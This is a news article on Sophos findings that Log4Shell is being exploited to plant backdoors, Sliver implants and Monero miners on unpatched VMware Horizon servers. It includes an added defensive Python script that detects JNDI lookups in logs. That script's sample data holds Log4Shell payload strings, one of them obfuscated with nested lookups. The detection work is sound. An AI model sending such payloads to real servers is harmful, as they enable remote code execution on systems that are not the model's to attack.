
Log4Shell exploited to infect VMware Horizon servers with backdoors, crypto miners

Mar 29, 2022 | Hi-network.com

The Log4Shell vulnerability is being actively exploited to deliver backdoors and cryptocurrency miners to vulnerable VMware Horizon servers.

On Tuesday, Sophos cybersecurity researchers said the attacks were first detected in mid-January and are ongoing. Not only are backdoors and cryptocurrency miners being deployed, but in addition, scripts are used to gather and steal device information.

Log4Shell is a critical vulnerability in the Apache Log4j Java logging library. The unauthenticated remote code execution (RCE) vulnerability was made public in December 2021 and is tracked as CVE-2021-44228 with a CVSS score of 10.0.

Researchers have warned that exploitation of Log4Shell is likely to continue for years, especially considering how simple the bug is to exploit.

Microsoft previously detected Log4Shell attacks conducted by state-sponsored cybercriminals, but most appear to focus on cryptocurrency mining, ransomware, and bot activities. A patch was released in December 2021, but as is often the case with internet-facing servers, many systems have not been updated.
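As an added defender-side example (not part of the article or of Sophos's research), the script below triages web-server log lines for Log4Shell lookup strings, first collapsing the nested Log4j lookups that are commonly used to split the literal `jndi`. The log lines and addresses are constructed for the example.

```python
import re

# Constructed sample access-log lines (not from the article): two benign requests,
# one plain Log4Shell probe in the User-Agent, one hidden behind nested lookups.
SAMPLE_LOGS = [
    '10.0.0.5 - - [15/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - [15/Jan/2022:10:01:05 +0000] "GET /broker/xml HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.7 - - [15/Jan/2022:10:02:11 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-r}mi://203.0.113.8/x}"',
    '10.0.0.8 - - [15/Jan/2022:10:03:00 +0000] "GET /static/app.js HTTP/1.1" 200 "curl/7.68.0"',
]

# Inner Log4j lookups that resolve to a literal: ${lower:X}, ${upper:X},
# ${env:UNSET:-X}, ${::-X}. Each one is replaced by X so the outer lookup reads plainly.
_INNER = re.compile(
    r"\$\{(?:[a-z]*:)?[^${}]*?:-([^${}]*)\}|\$\{(?:lower|upper):([^${}]*)\}", re.I
)

# The outer lookup we want to catch, with its scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def normalize(s: str) -> str:
    """Repeatedly collapse nested lookups until nothing changes (each pass removes one ${...})."""
    prev = None
    while prev != s:
        prev = s
        s = _INNER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


def detect(line: str):
    """Return the JNDI scheme if the line carries a Log4Shell lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (index, scheme) for every line that trips the detector."""
    hits = []
    for i, line in enumerate(lines):
        scheme = detect(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOGS):
        print(f"line {idx}: Log4Shell lookup via {scheme} -> {SAMPLE_LOGS[idx]}")
```

A hit is a reason to pull the host's Log4j version and look for follow-on artefacts (web shells, unexpected remote-access agents, miner processes), since a blocked or failed probe and a successful one look the same in the access log.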

According to Sophos, the latest Log4Shell attacks target unpatched VMware Horizon servers with three different backdoors and four cryptocurrency miners.

The attackers behind the campaign are leveraging the bug to obtain access to vulnerable servers. Once they have infiltrated the system, Atera agent or Splashtop Streamer, two legitimate remote monitoring software packages, may be installed, with their purpose twisted into becoming backdoor surveillance tools.

The other backdoor detected by Sophos is Sliver, an open-source offensive security implant released for use by pen testers and red teams.

Sophos says that four miners are linked to this wave of attacks: z0Miner, JavaX miner, Jin, and Mimu, which mine for Monero (XMR). Previously, Trend Micro found z0Miner operators were exploiting the Atlassian Confluence RCE (CVE-2021-26084) for cryptojacking attacks.


A PowerShell URL shared by both campaigns suggests there may also be a link between them, although that is uncertain.

"While z0Miner, JavaX, and some other payloads were downloaded directly by the web shells used for initial compromise, the Jin bots were tied to the use of Sliver, and used the same wallets as Mimo -- suggesting these three malware [strains] were used by the same actor," the researchers say.

In addition, the researchers uncovered evidence of reverse shell deployment designed to collect device and backup information.

"Log4J is installed in hundreds of software products and many organizations may be unaware of the vulnerability lurking within their infrastructure, particularly in commercial, open-source or custom software that doesn't have regular security support," commented Sean Gallagher, Sophos senior security researcher. "And while patching is vital, it won't be enough if attackers have already been able to install a web shell or backdoor in the network."

Previous and related coverage

  • Log4j update: Experts say log4shell exploits will persist for 'months if not years'
  • Log4j flaw: Attackers are targeting Log4Shell vulnerabilities in VMware Horizon servers, says NHS
  • Log4Shell flaw: Still being used for crypto mining, botnet building... and Rickrolls
